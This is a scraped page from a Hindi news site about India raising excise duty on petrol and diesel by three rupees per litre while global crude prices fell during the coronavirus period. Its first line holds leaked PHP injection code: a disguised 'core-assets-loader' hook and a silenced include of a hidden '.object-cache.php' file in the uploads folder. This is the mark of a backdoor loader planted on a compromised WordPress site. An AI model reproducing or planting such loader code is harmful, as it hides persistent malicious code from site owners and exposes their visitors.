add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दुनिया में कच्चा तेल सस्ता, देश में पेट्रोल-डीजल पर तीन रुपये बढ़ी एक्साइज ड्यूटी – SOCH INDIA
Menu

देश
दुनिया में कच्चा तेल सस्ता, देश में पेट्रोल-डीजल पर तीन रुपये बढ़ी एक्साइज ड्यूटी

nobanner

कोरोना वायरस का असर लोगों की दिनचर्या के साथ ही दुनिया की अर्थव्यवस्था पर भी देखा जा रहा है. कोरोना वायरस के कारण दुनियाभर के कारोबार को झटका लगा है. कोरोना के असर के चलते दुनिया में तेल को लेकर प्राइज वॉर भी देखने को मिल रहा है. इस बीच भारत में पेट्रोल-डीजल पर तीन रुपये प्रति लीटर के हिसाब से एक्साइज ड्यूटी बढ़ा दी गई है.

दुनिया में तेल पर छिड़े प्राइज वॉर के बीच कच्चे तेल के दाम में कमी आई है. जिसके कारण पेट्रोल-डीजल के दाम में मामूली गिरावट हर दिन देखने को मिल रही हैं. हालांकि कीमतें गिरने का फायदा भारत में ग्राहकों को मिलता हुआ दिखाई नहीं दे रहा है. वहीं एक्साइज ड्यूटी तीन रुपये बढ़ाए जाने से ग्राहकों पर इसका असर भी ज्यादा नहीं होगा. दरअसल, भारत में पेट्रोल-डीजल पर एक्साइज ड्यूटी ऐसे वक्त में बढ़ाई गई है, जब पूरी दुनिया में कच्चे तेल की कीमतें घट गई हैं.